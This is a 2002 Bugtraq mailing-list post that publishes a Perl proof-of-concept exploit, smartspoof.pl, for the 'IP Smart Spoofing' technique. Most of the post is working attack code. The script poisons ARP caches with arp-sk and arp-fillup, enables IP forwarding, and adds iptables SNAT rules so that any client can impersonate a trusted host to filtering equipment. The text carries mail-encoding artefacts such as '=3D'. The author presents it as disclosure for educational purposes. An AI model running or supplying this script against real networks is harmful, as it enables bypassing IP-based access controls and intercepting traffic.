Exploit code for IP Smart Spoofing
Date: Tue, 12 Nov 2002 13:21:17 +0100
From: Laurent Licour <llicour@althes.fr>
To: "bugtraq@securityfocus.com" <bugtraq@securityfocus.com>
Subject: Exploit code for IP Smart Spoofing
Hello
As we reported in our previous article: IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced a
new method for IP Spoofing, allowing full-connexion from any client
software.
The exploit code smartspoof.pl is a proof of concept (for educational
purpose only) of the Smart Spoofing method
The additional software "arp-fillup" is necessary to achieve this:
http://www.althes.fr/ressources/tools/arp-fillup/arp-fillup-0.1.tgz
These tools are also available on
http://www.althes.fr/ressources/avis/smartspoofing.htm#tools
Exploit Code (perl source) :
#!/usr/bin/perl -w
#
# smartspoof.pl
#
# This script is provided as proof of concept for educational purpose only
#
# Laurent Licour 28/10/02
# llicour@althes.fr
# Althes (http://www.althes.fr)
#
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
#
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool (www.althes.fr/ressources/avis/smartspoofing.htm)
# Require iptables (www.iptables.org)
use strict;
use Getopt::Long;
use NetAddr::IP;
sub get_ip_next_hop
{
my ($ip0, $int) =3D @_;
my $ip=3Dnew NetAddr::IP $ip0;
=20
open(ROUTE, "route -n |");
<ROUTE>; <ROUTE>;
my $gateway=3D"";
my $masklen; my @fields; my $line; my $entry;
while($line =3D <ROUTE>)
{
@fields =3D split / +/, $line;
$entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]);
if ($entry->contains($ip))
{
if (($gateway eq "") or ($masklen < $entry->masklen()))
{
$gateway =3D $fields[1];
$masklen =3D $entry->masklen();
$$int =3D $fields[7];
chop $$int;
}
}
}
die "Error : No route for $ip \n" if ($gateway eq "");
$gateway=3D$ip->addr() if ($gateway eq "0.0.0.0");
return($gateway);
}
sub get_mac
{
my $ip=3Dshift;
my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1";
system($cmd);
$cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
my $mac=3D`$cmd`;
chop($mac);
return($mac);
}
sub usage
{
print "Start/Stop de smartspoofing\n\n";
print "This is the proof of concept of the smartspoofing technique\n";
print "(visit http://www.althes.fr/ressources/avis/smartspoofing.htm)\n";
print "\n";
print "You only have to specify :\n";
print " -D : address of the filtering equipement to connect to\n";
print " -S : address of the trusted host to spoof\n";
print "\n";
print "Then, you only need to launch your favorite client software from
this host\n";
print "or any host behind this (because it is now a router)\n";
print "\n";
print "This script is provided as proof of concept for educational purpose
only.\n";
print "\n";
exit 0;
}
my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S <\@=
IP
source> -start|-stop\n";
my $ver =3D "smartspoof.pl v1.0 28/10/02\n";
my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface =3D "";
my ($version, $help);
Getopt::Long::GetOptions(
"D=3Ds" =3D> \$ipdst,
"S=3Ds" =3D> \$ipsrc,
"i=3Ds" =3D> \$interface,
"v" =3D> \$version,
"h" =3D> \$help,
"start" =3D> \$start,
"stop" =3D> \$stop
) or die $syntax;
usage if $help;
die $ver if $version;
die $syntax unless @ARGV =3D=3D 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;
my $cmd;
my ($intsrc, $intdst);
my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst);
$interface=3D$intdst if ($interface eq "");
if ($start)
{
print "Activate IP Forwarding\n";
system("echo 1 > /proc/sys/net/ipv4/ip_forward");
print "Activate Arp fillup on $ipsrc\n";
system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");
print "Set NAT rule on iptables\n";
$cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT --=
to
$ipsrc";
system($cmd);
print "Desactivate ICMP Redirect\n";
system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j DROP");
print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop on $interface\n";
$cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D
$ipdst_next_hop -c 1 >/dev/null 2>&1";
system($cmd);
$cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop -D
$ipdst_next_hop >/dev/null 2>&1 &";
system($cmd);
}
elsif ($stop)
{
print "Suppress Arp fillup on $ipsrc\n";
system("killall arp-fillup");
print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop\n";
system("killall arp-sk");
my $mac=3Dget_mac($ipsrc_next_hop);
$cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
$ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";
system($cmd);
print "Clear iptables rules\n";
system("service iptables stop");
system("service iptables start");
print "Desactivate ip forwarding\n";
system("echo 0 > /proc/sys/net/ipv4/ip_forward");
}
Regards
Laurent Licour
mailto:llicour@althes.fr
Althes
http://www.althes.fr
=20
*---------------------------------------------------------------*
* Cet e-mail et toutes les pi=E8ces jointes sont destin=E9s aux *
* seules personnes auxquelles ils sont sp=E9cifiquement adress=E9s *
* et n'engagent que le signataire de ces documents et non la *
* structure dont il d=E9pend. *
* Leur existence et leur contenu ont un caract=E8re confidentiel. *
* Toute utilisation ou diffusion non autoris=E9e est interdite. *
* Si vous avez re=E7u cet e-mail ou si vous d=E9tenez sans en =EAtre *
* le destinataire, nous vous demandons de bien vouloir nous en *
* informer imm=E9diatement. *
* Cette note assure que ce message a =E9t=E9 contr=F4l=E9 et ne *
* comprenait aucun virus connu =E0 ce jour, n=E9anmoins tout *
* message =E9lectronique est susceptible d'alt=E9ration. *
* Nous d=E9clinons toute responsabilit=E9 au titre de ce message *
* s'il a =E9t=E9 alt=E9r=E9, d=E9form=E9 ou falsifi=E9. =
*
*---------------------------------------------------------------*
=20
